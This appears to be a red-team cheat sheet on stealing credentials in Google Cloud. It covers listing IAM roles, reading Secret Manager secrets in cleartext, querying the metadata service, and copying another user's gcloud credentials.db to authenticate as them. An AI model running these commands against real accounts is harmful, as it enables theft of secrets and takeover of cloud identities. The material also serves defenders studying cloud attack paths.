Credential Access

Credential access is a set of techniques that attackers use to steal user credentials like account names and passwords.

Secret Manager

Secret Manager is a service utilized for securely storing all types of secrets, such as keys and passwords, within Google Cloud. Permissions within Secret Manager can be defined either project-wide or on an individual secret basis, offering granular control over access to sensitive information.

- Cleartext Credential Access

Cleartext Credential Access involves threat actors aiming to obtain the plaintext value of a secret stored in Secret Manager. Permissions required for such access include roles/owner, roles/secretmanager.admin, and roles/secretmanager.secretAccessor, along with the specific permission secretmanager.versions.access.

Check iam policy on project level:

gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"

List all the secrets in a project:

gcloud secrets list

Get Iam policy on individual secret level:

gcloud secrets get-iam-policy [my-secret]

List of all version for a secret:

gcloud secrets versions list [SecretName]

Get the cleartext value of a secret:

gcloud secrets versions access --secret cpsa-key-json [1]

Source Code / Configuration file

We can find credentials in the source code of the application, or, if we are able to compromise an instance or an user, we can harvest its config file.

Gcloud stores creds in ~/.config/gcloud/credentials.db, so, to search home directories:

sudo find /home -name "credentials.db

The, copy gcloud dir to your own home directory to authenticate as the compromised user:

sudo cp -r /home/username/.config/gcloud ~/.config

sudo chown -R currentuser:currentuser ~/.config/gcloud

gcloud auth list

Environment Variable

Metadata

Metadata Service URL: curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"